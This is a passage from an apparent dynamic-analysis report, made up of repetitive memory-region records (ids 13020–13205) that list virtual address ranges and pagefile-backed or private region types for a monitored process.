= 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13020 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13021 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13022 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13023 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13024 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13025 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13026 start_va = 0x1e80000 end_va = 0x1e8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e80000" filename = "" Region: id = 13027 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 13028 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 13029 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 13030 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13031 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13032 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13033 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13034 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13035 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 13036 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 13037 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13038 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13039 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13040 start_va = 0x1e80000 end_va = 0x1e8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e80000" filename = "" Region: id = 13041 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 13042 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 13043 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 13044 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 13045 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 13046 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 13047 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 13048 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 13049 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 13050 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 13051 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 13052 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 13053 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 13054 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 13055 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 13056 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 13057 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 13058 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 13059 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 13060 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 13061 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 13062 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 13063 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 13064 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 13065 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 13066 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 13067 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 13068 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 13069 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 13070 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 13071 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 13072 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 13073 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 13074 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 13075 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 13076 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 13077 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 13078 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 13079 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 13080 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 13081 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 13082 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 13083 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 13084 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 13085 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 13086 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 13087 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 13088 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 13089 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 13090 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 13091 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 13092 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 13093 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 13094 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 13095 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 13096 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 13097 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 13098 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13099 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13100 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13101 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13102 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13103 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13104 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13105 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13106 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13107 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13108 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13109 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13110 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13111 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13112 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13113 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13114 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13115 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13116 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13117 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13118 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13119 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13120 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13121 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13122 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13123 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13124 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13125 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13126 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13127 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13128 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13129 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13130 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13131 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13132 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13133 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13134 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13135 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13136 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13137 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13138 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13139 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13140 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13141 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13142 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13143 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13144 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13145 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 13146 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 13147 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13148 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13149 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 13150 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 13151 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13152 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13153 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13154 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13155 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13156 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13157 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13158 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13159 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13160 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13161 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13162 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13163 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13164 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13165 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13166 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13167 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13168 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13169 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13170 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13171 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13172 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13173 start_va = 0x1e80000 end_va = 0x1e8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e80000" filename = "" Region: id = 13174 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 13175 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 13176 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 13177 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13178 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13179 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13180 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13181 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13182 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13183 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13184 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13185 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13186 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13187 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13188 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13189 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13190 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13191 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13192 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13193 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13194 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13195 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13196 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13197 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13198 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13199 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13200 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13201 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13202 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13203 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13204 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13205 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = 